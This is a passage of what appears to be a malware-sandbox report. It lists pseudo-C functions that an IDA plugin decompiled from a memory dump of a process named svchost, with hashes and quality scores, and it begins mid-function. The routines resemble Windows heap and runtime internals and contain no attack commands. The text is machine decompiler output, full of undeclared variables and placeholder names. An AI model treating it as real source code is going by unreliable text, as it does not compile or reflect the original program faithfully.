                        					_push(0x18);
                        					_push( &_v36);
                        					_push(0x1e);
                        					_t88 = E0306B0B0();
                        					if(_t88 != 0xc0000023) {
                        						break;
                        					}
                        					if(_t85 !=  &_v156) {
                        						L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
                        					}
                        					_t84 = L03044620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
                        					_v168 = _v164;
                        					if(_t84 == 0) {
                        						_t88 = 0xc0000017;
                        						goto L19;
                        					} else {
                        						_t74 = _v160 + 1;
                        						_v160 = _t74;
                        						if(_t74 >= 0x10) {
                        							L19:
                        							_t86 = E0302CCC0(_t88);
                        							if(_t86 != 0) {
                        								L8:
                        								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
                        								_t30 = _t77 + 0x24; // 0x3118504
                        								E0303FFB0(_t77, _t84, _t30);
                        								if(_t84 != 0 && _t84 !=  &_v156) {
                        									L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
                        								}
                        								if(_t86 != 0) {
                        									goto L12;
                        								} else {
                        									goto L11;
                        								}
                        							}
                        							L6:
                        							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
                        							if(_v164 != 0) {
                        								_t83 = _t84;
                        								E03054F49(_t77, _t84);
                        							}
                        							goto L8;
                        						}
                        						_t87 = _v168;
                        						continue;
                        					}
                        				}
                        				if(_t88 != 0) {
                        					goto L19;
                        				}
                        				goto L6;
                        			}



























                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2fa8aa891500bfb07fe752d45f676a8779b6b9b3c5d1af7d082de0b8f426d871
                        • Instruction ID: 7c383d52e175082f019e877642dad22348c6fde4b92f65b6e2345ceacb4f303f
                        • Opcode Fuzzy Hash: 2fa8aa891500bfb07fe752d45f676a8779b6b9b3c5d1af7d082de0b8f426d871
                        • Instruction Fuzzy Hash: 1641B275A022289BDF60DF65CD40BEFB7F8EF85710F4504A6E908AB240DB759E80CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 78%
                        			E03054D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                        				signed int _v12;
                        				char _v176;
                        				char _v177;
                        				char _v184;
                        				intOrPtr _v192;
                        				intOrPtr _v196;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed short _t42;
                        				char* _t44;
                        				intOrPtr _t46;
                        				intOrPtr _t50;
                        				char* _t57;
                        				intOrPtr _t59;
                        				intOrPtr _t67;
                        				signed int _t69;
                        
                        				_t64 = __edx;
                        				_v12 =  *0x311d360 ^ _t69;
                        				_t65 = 0xa0;
                        				_v196 = __edx;
                        				_v177 = 0;
                        				_t67 = __ecx;
                        				_v192 = __ecx;
                        				E0306FA60( &_v176, 0, 0xa0);
                        				_t57 =  &_v176;
                        				_t59 = 0xa0;
                        				if( *0x3117bc8 != 0) {
                        					L3:
                        					while(1) {
                        						asm("movsd");
                        						asm("movsd");
                        						asm("movsd");
                        						asm("movsd");
                        						_t67 = _v192;
                        						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                        						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                        						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                        						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                        						_push( &_v184);
                        						_push(_t59);
                        						_push(_t57);
                        						_push(0xa0);
                        						_push(_t57);
                        						_push(0xf);
                        						_t42 = E0306B0B0();
                        						if(_t42 != 0xc0000023) {
                        							break;
                        						}
                        						if(_v177 != 0) {
                        							L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                        						}
                        						_v177 = 1;
                        						_t44 = L03044620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                        						_t59 = _v184;
                        						_t57 = _t44;
                        						if(_t57 != 0) {
                        							continue;
                        						} else {
                        							_t42 = 0xc0000017;
                        							break;
                        						}
                        					}
                        					if(_t42 != 0) {
                        						_t65 = E0302CCC0(_t42);
                        						if(_t65 != 0) {
                        							L10:
                        							if(_v177 != 0) {
                        								if(_t57 != 0) {
                        									L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                        								}
                        							}
                        							_t46 = _t65;
                        							L12:
                        							return E0306B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                        						}
                        						L7:
                        						_t50 = _a4;
                        						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                        						if(_t50 != 3) {
                        							if(_t50 == 2) {
                        								goto L8;
                        							}
                        							L9:
                        							if(E0306F380(_t67 + 0xc, 0x3005138, 0x10) == 0) {
                        								 *0x31160d8 = _t67;
                        							}
                        							goto L10;
                        						}
                        						L8:
                        						_t64 = _t57 + 0x28;
                        						E03054F49(_t67, _t57 + 0x28);
                        						goto L9;
                        					}
                        					_t65 = 0;
                        					goto L7;
                        				}
                        				if(E03054E70(0x31186b0, 0x3055690, 0, 0) != 0) {
                        					_t46 = E0302CCC0(_t56);
                        					goto L12;
                        				} else {
                        					_t59 = 0xa0;
                        					goto L3;
                        				}
                        			}


                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4557b36a8c2ca2a8f2f29c929d38f15198db855b5efc170d66ac0c9bb945087e
                        • Instruction ID: 144e6aee84183f45f75f75b45bd40dba32beec53a218fe47eaea3627f7cb7bf4
                        • Opcode Fuzzy Hash: 4557b36a8c2ca2a8f2f29c929d38f15198db855b5efc170d66ac0c9bb945087e
                        • Instruction Fuzzy Hash: 4241B2B5A423189FEB21DF15CC80BEBB7E9EB45610F0444AAFD459B280D771EE84CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 94%
                        			E03038A0A(intOrPtr* __ecx, signed int __edx) {
                        				signed int _v8;
                        				char _v524;
                        				signed int _v528;
                        				void* _v532;
                        				char _v536;
                        				char _v540;
                        				char _v544;
                        				intOrPtr* _v548;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t44;
                        				void* _t46;
                        				void* _t48;
                        				signed int _t53;
                        				signed int _t55;
                        				intOrPtr* _t62;
                        				void* _t63;
                        				unsigned int _t75;
                        				signed int _t79;
                        				unsigned int _t81;
                        				unsigned int _t83;
                        				signed int _t84;
                        				void* _t87;
                        
                        				_t76 = __edx;
                        				_v8 =  *0x311d360 ^ _t84;
                        				_v536 = 0x200;
                        				_t79 = 0;
                        				_v548 = __edx;
                        				_v544 = 0;
                        				_t62 = __ecx;
                        				_v540 = 0;
                        				_v532 =  &_v524;
                        				if(__edx == 0 || __ecx == 0) {
                        					L6:
                        					return E0306B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
                        				} else {
                        					_v528 = 0;
                        					E0303E9C0(1, __ecx, 0, 0,  &_v528);
                        					_t44 = _v528;
                        					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
                        					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
                        					_t46 = 0xa;
                        					_t87 = _t81 - _t46;
                        					if(_t87 > 0 || _t87 == 0) {
                        						 *_v548 = 0x3001180;
                        						L5:
                        						_t79 = 1;
                        						goto L6;
                        					} else {
                        						_t48 = E03051DB5(_t62,  &_v532,  &_v536);
                        						_t76 = _v528;
                        						if(_t48 == 0) {
                        							L9:
                        							E03063C2A(_t81, _t76,  &_v544);
                        							 *_v548 = _v544;
                        							goto L5;
                        						}
                        						_t62 = _v532;
                        						if(_t62 != 0) {
                        							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
                        							_t53 =  *_t62;
                        							_v528 = _t53;
                        							if(_t53 != 0) {
                        								_t63 = _t62 + 4;
                        								_t55 = _v528;
                        								do {
                        									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
                        										if(E03038999(_t63,  &_v540) == 0) {
                        											_t55 = _v528;
                        										} else {
                        											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
                        											_t55 = _v528;
                        											if(_t75 >= _t83) {
                        												_t83 = _t75;
                        											}
                        										}
                        									}
                        									_t63 = _t63 + 0x14;
                        									_t55 = _t55 - 1;
                        									_v528 = _t55;
                        								} while (_t55 != 0);
                        								_t62 = _v532;
                        							}
                        							if(_t62 !=  &_v524) {
                        								L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
                        							}
                        							_t76 = _t83 & 0x0000ffff;
                        							_t81 = _t83 >> 0x10;
                        						}
                        						goto L9;
                        					}
                        				}
                        			}


                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 231cf2bbb803660ea8b11ff0764869ade6d3ef4cdcd3c4c2ec93f749332037c2
                        • Instruction ID: 8769226e4ed727d305c5164044a3221de1e578780b5bc5d0e9287e8a8dae504d
                        • Opcode Fuzzy Hash: 231cf2bbb803660ea8b11ff0764869ade6d3ef4cdcd3c4c2ec93f749332037c2
                        • Instruction Fuzzy Hash: F74163B5A0232D9BDB64DF15CC88AEAB7FCEB85300F1485E9E81997251D7709E88CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E030EAA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
                        				intOrPtr _v8;
                        				char _v12;
                        				signed int _v16;
                        				signed char _v20;
                        				intOrPtr _v24;
                        				char* _t37;
                        				void* _t47;
                        				signed char _t51;
                        				void* _t53;
                        				char _t55;
                        				intOrPtr _t57;
                        				signed char _t61;
                        				intOrPtr _t75;
                        				void* _t76;
                        				signed int _t81;
                        				intOrPtr _t82;
                        
                        				_t53 = __ecx;
                        				_t55 = 0;
                        				_v20 = _v20 & 0;
                        				_t75 = __edx;
                        				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
                        				_v24 = __edx;
                        				_v12 = 0;
                        				if((_t81 & 0x01000000) != 0) {
                        					L5:
                        					if(_a8 != 0) {
                        						_t81 = _t81 | 0x00000008;
                        					}
                        					_t57 = E030EABF4(_t55 + _t75, _t81);
                        					_v8 = _t57;
                        					if(_t57 < _t75 || _t75 > 0x7fffffff) {
                        						_t76 = 0;
                        						_v16 = _v16 & 0;
                        					} else {
                        						_t59 = _t53;
                        						_t76 = E030EAB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
                        						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
                        							_t47 = E030EAC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
                        							_t61 = _v20;
                        							if(_t61 != 0) {
                        								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
                        								if(E030CCB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
                        									L030477F0(_t53, 0, _t76);
                        									_t76 = 0;
                        								}
                        							}
                        						}
                        					}
                        					_t82 = _v8;
                        					L16:
                        					if(E03047D50() == 0) {
                        						_t37 = 0x7ffe0380;
                        					} else {
                        						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        					}
                        					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                        						E030E131B(_t53, _t76, _t82, _v16);
                        					}
                        					return _t76;
                        				}
                        				_t51 =  *(__ecx + 0x20);
                        				_v20 = _t51;
                        				if(_t51 == 0) {
                        					goto L5;
                        				}
                        				_t81 = _t81 | 0x00000008;
                        				if(E030CCB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
                        					_t55 = _v12;
                        					goto L5;
                        				} else {
                        					_t82 = 0;
                        					_t76 = 0;
                        					_v16 = _v16 & 0;
                        					goto L16;
                        				}
                        			}


                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                        • Instruction ID: 1023457d7c1d4514b16c9cd497ec3cc07c7e73b484066ba8cd620d720c59bb8b
                        • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                        • Instruction Fuzzy Hash: 2231E436F12244AFDB15DB69CC85BAFF7BBEFC8610F094069E815AB292DB749D00C650
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 76%
                        			E030EFDE2(signed int* __ecx, signed int __edx, signed int _a4) {
                        				char _v8;
                        				signed int _v12;
                        				signed int _t29;
                        				char* _t32;
                        				char* _t43;
                        				signed int _t80;
                        				signed int* _t84;
                        
                        				_push(__ecx);
                        				_push(__ecx);
                        				_t56 = __edx;
                        				_t84 = __ecx;
                        				_t80 = E030EFD4E(__ecx, __edx);
                        				_v12 = _t80;
                        				if(_t80 != 0) {
                        					_t29 =  *__ecx & _t80;
                        					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
                        					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
                        						E030F0A13(__ecx, _t80, 0, _a4);
                        						_t80 = 1;
                        						if(E03047D50() == 0) {
                        							_t32 = 0x7ffe0380;
                        						} else {
                        							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        						}
                        						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                        							_push(3);
                        							L21:
                        							E030E1608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
                        						}
                        						goto L22;
                        					}
                        					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
                        						_t80 = E030F2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
                        						if(_t80 != 0) {
                        							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
                        							_t77 = _v8;
                        							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
                        								E030EC8F7(_t66, _t77, 0);
                        							}
                        						}
                        					} else {
                        						_t80 = E030EDBD2(__ecx[0xb], _t74, __edx, _a4);
                        					}
                        					if(E03047D50() == 0) {
                        						_t43 = 0x7ffe0380;
                        					} else {
                        						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        					}
                        					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
                        						goto L22;
                        					} else {
                        						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
                        						goto L21;
                        					}
                        				} else {
                        					_push(__ecx);
                        					_push(_t80);
                        					E030EA80D(__ecx[0xf], 9, __edx, _t80);
                        					L22:
                        					return _t80;
                        				}
                        			}


                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                        • Instruction ID: 6d3f7c8532f286b200e322c5902c9164ad4261ba1152819ebb2a0ada1c744ac0
                        • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                        • Instruction Fuzzy Hash: 55310736302741AFD322DB68C844FAABBEAEFC5650F1E4459E8468B742DB74EC41C720
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 70%
                        			E030EEA55(intOrPtr* __ecx, char __edx, signed int _a4) {
                        				signed int _v8;
                        				char _v12;
                        				intOrPtr _v15;
                        				char _v16;
                        				intOrPtr _v19;
                        				void* _v28;
                        				intOrPtr _v36;
                        				void* __ebx;
                        				void* __edi;
                        				signed char _t26;
                        				signed int _t27;
                        				char* _t40;
                        				unsigned int* _t50;
                        				intOrPtr* _t58;
                        				unsigned int _t59;
                        				char _t75;
                        				signed int _t86;
                        				intOrPtr _t88;
                        				intOrPtr* _t91;
                        
                        				_t75 = __edx;
                        				_t91 = __ecx;
                        				_v12 = __edx;
                        				_t50 = __ecx + 0x30;
                        				_t86 = _a4 & 0x00000001;
                        				if(_t86 == 0) {
                        					E03042280(_t26, _t50);
                        					_t75 = _v16;
                        				}
                        				_t58 = _t91;
                        				_t27 = E030EE815(_t58, _t75);
                        				_v8 = _t27;
                        				if(_t27 != 0) {
                        					E0302F900(_t91 + 0x34, _t27);
                        					if(_t86 == 0) {
                        						E0303FFB0(_t50, _t86, _t50);
                        					}
                        					_push( *((intOrPtr*)(_t91 + 4)));
                        					_push( *_t91);
                        					_t59 =  *(_v8 + 0x10);
                        					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
                        					_push(0x8000);
                        					_t11 = _t53 - 1; // 0x0
                        					_t12 = _t53 - 1; // 0x0
                        					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
                        					E030EAFDE( &_v12,  &_v16);
                        					asm("lock xadd [eax], ecx");
                        					asm("lock xadd [eax], ecx");
                        					E030EBCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
                        					_t55 = _v36;
                        					_t88 = _v36;
                        					if(E03047D50() == 0) {
                        						_t40 = 0x7ffe0388;
                        					} else {
                        						_t55 = _v19;
                        						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        					}
                        					if( *_t40 != 0) {
                        						E030DFE3F(_t55, _t91, _v15, _t55);
                        					}
                        				} else {
                        					if(_t86 == 0) {
                        						E0303FFB0(_t50, _t86, _t50);
                        						_t75 = _v16;
                        					}
                        					_push(_t58);
                        					_t88 = 0;
                        					_push(0);
                        					E030EA80D(_t91, 8, _t75, 0);
                        				}
                        				return _t88;
                        			}


                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                        • Instruction ID: 672bfd708b1a48836eb2c4a9cc5d61bc3719f9b01f271e8be8b466e330bc2abf
                        • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                        • Instruction Fuzzy Hash: 8A31B476706709AFC719DF24C880A9BB7E9FFC4210F08492DF5568B644DE30E805C7A1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 69%
                        			E030A69A6(signed short* __ecx, void* __eflags) {
                        				signed int _v8;
                        				signed int _v16;
                        				intOrPtr _v20;
                        				signed int _v24;
                        				signed short _v28;
                        				signed int _v32;
                        				intOrPtr _v36;
                        				signed int _v40;
                        				char* _v44;
                        				signed int _v48;
                        				intOrPtr _v52;
                        				signed int _v56;
                        				char _v60;
                        				signed int _v64;
                        				char _v68;
                        				char _v72;
                        				signed short* _v76;
                        				signed int _v80;
                        				char _v84;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* _t68;
                        				intOrPtr _t73;
                        				signed short* _t74;
                        				void* _t77;
                        				void* _t78;
                        				signed int _t79;
                        				signed int _t80;
                        
                        				_v8 =  *0x311d360 ^ _t80;
                        				_t75 = 0x100;
                        				_v64 = _v64 & 0x00000000;
                        				_v76 = __ecx;
                        				_t79 = 0;
                        				_t68 = 0;
                        				_v72 = 1;
                        				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                        				_t77 = 0;
                        				if(L03036C59(__ecx[2], 0x100, __eflags) != 0) {
                        					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                        					if(_t79 != 0 && E030A6BA3() != 0) {
                        						_push(0);
                        						_push(0);
                        						_push(0);
                        						_push(0x1f0003);
                        						_push( &_v64);
                        						if(E03069980() >= 0) {
                        							E03042280(_t56, 0x3118778);
                        							_t77 = 1;
                        							_t68 = 1;
                        							if( *0x3118774 == 0) {
                        								asm("cdq");
                        								 *(_t79 + 0xf70) = _v64;
                        								 *(_t79 + 0xf74) = 0x100;
                        								_t75 = 0;
                        								_t73 = 4;
                        								_v60 =  &_v68;
                        								_v52 = _t73;
                        								_v36 = _t73;
                        								_t74 = _v76;
                        								_v44 =  &_v72;
                        								 *0x3118774 = 1;
                        								_v56 = 0;
                        								_v28 = _t74[2];
                        								_v48 = 0;
                        								_v20 = ( *_t74 & 0x0000ffff) + 2;
                        								_v40 = 0;
                        								_v32 = 0;
                        								_v24 = 0;
                        								_v16 = 0;
                        								if(E0302B6F0(0x300c338, 0x300c288, 3,  &_v60) == 0) {
                        									_v80 = _v80 | 0xffffffff;
                        									_push( &_v84);
                        									_push(0);
                        									_push(_v64);
                        									_v84 = 0xfa0a1f00;
                        									E03069520();
                        								}
                        							}
                        						}
                        					}
                        				}
                        				if(_v64 != 0) {
                        					_push(_v64);
                        					E030695D0();
                        					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
                        					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
                        				}
                        				if(_t77 != 0) {
                        					E0303FFB0(_t68, _t77, 0x3118778);
                        				}
                        				_pop(_t78);
                        				return E0306B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
                        			}

































                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fcd4f9a8952251f7d34f681171f2ca8314e820b16adcab74582d0cd4f71fcd3c
                        • Instruction ID: 3ebbdefedc1108a3845fdc3798429bfdfbf165583ec86013f2c9ddc430a912a9
                        • Opcode Fuzzy Hash: fcd4f9a8952251f7d34f681171f2ca8314e820b16adcab74582d0cd4f71fcd3c
                        • Instruction Fuzzy Hash: 31416AB1E02708AFDB14DFA9D940BFEBBF8EF48714F08812AE814A7250DB719905CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 85%
                        			E03025210(intOrPtr _a4, void* _a8) {
                        				void* __ecx;
                        				intOrPtr _t31;
                        				signed int _t32;
                        				signed int _t33;
                        				intOrPtr _t35;
                        				signed int _t52;
                        				void* _t54;
                        				void* _t56;
                        				unsigned int _t59;
                        				signed int _t60;
                        				void* _t61;
                        
                        				_t61 = E030252A5(1);
                        				if(_t61 == 0) {
                        					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                        					_t54 =  *((intOrPtr*)(_t31 + 0x28));
                        					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
                        				} else {
                        					_t54 =  *((intOrPtr*)(_t61 + 0x10));
                        					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
                        				}
                        				_t60 = _t59 >> 1;
                        				_t32 = 0x3a;
                        				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
                        					_t52 = _t60 + _t60;
                        					if(_a4 > _t52) {
                        						goto L5;
                        					}
                        					if(_t61 != 0) {
                        						asm("lock xadd [esi], eax");
                        						if((_t32 | 0xffffffff) == 0) {
                        							_push( *((intOrPtr*)(_t61 + 4)));
                        							E030695D0();
                        							L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                        						}
                        					} else {
                        						E0303EB70(_t54, 0x31179a0);
                        					}
                        					_t26 = _t52 + 2; // 0xddeeddf0
                        					return _t26;
                        				} else {
                        					_t52 = _t60 + _t60;
                        					if(_a4 < _t52) {
                        						if(_t61 != 0) {
                        							asm("lock xadd [esi], eax");
                        							if((_t32 | 0xffffffff) == 0) {
                        								_push( *((intOrPtr*)(_t61 + 4)));
                        								E030695D0();
                        								L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                        							}
                        						} else {
                        							E0303EB70(_t54, 0x31179a0);
                        						}
                        						return _t52;
                        					}
                        					L5:
                        					_t33 = E0306F3E0(_a8, _t54, _t52);
                        					if(_t61 == 0) {
                        						E0303EB70(_t54, 0x31179a0);
                        					} else {
                        						asm("lock xadd [esi], eax");
                        						if((_t33 | 0xffffffff) == 0) {
                        							_push( *((intOrPtr*)(_t61 + 4)));
                        							E030695D0();
                        							L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                        						}
                        					}
                        					_t35 = _a8;
                        					if(_t60 <= 1) {
                        						L9:
                        						_t60 = _t60 - 1;
                        						 *((short*)(_t52 + _t35 - 2)) = 0;
                        						goto L10;
                        					} else {
                        						_t56 = 0x3a;
                        						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
                        							 *((short*)(_t52 + _t35)) = 0;
                        							L10:
                        							return _t60 + _t60;
                        						}
                        						goto L9;
                        					}
                        				}
                        			}















                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b67a97c65236850ef04c8a888c5e4ba273acb78cca28a33949468cd3361fce7a
                        • Instruction ID: 0464d92ffd5bfb43eee771ce51b16c30bf5e7a7f4b8964b6bb325bf9e6feb240
                        • Opcode Fuzzy Hash: b67a97c65236850ef04c8a888c5e4ba273acb78cca28a33949468cd3361fce7a
                        • Instruction Fuzzy Hash: F3310831643710EBC722EB18CC40FAAFBA9FF82764F154A2AE4550B5D0DB70E908C794
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 78%
                        			E0305A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                        				intOrPtr _t35;
                        				intOrPtr _t39;
                        				intOrPtr _t45;
                        				intOrPtr* _t51;
                        				intOrPtr* _t52;
                        				intOrPtr* _t55;
                        				signed int _t57;
                        				intOrPtr* _t59;
                        				intOrPtr _t68;
                        				intOrPtr* _t77;
                        				void* _t79;
                        				signed int _t80;
                        				intOrPtr _t81;
                        				char* _t82;
                        				void* _t83;
                        
                        				_push(0x24);
                        				_push(0x3100220);
                        				E0307D08C(__ebx, __edi, __esi);
                        				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
                        				_t79 = __ecx;
                        				_t35 =  *0x3117b9c; // 0x0
                        				_t55 = L03044620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
                        				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
                        				if(_t55 == 0) {
                        					_t39 = 0xc0000017;
                        					L11:
                        					return E0307D0D1(_t39);
                        				}
                        				_t68 = 0;
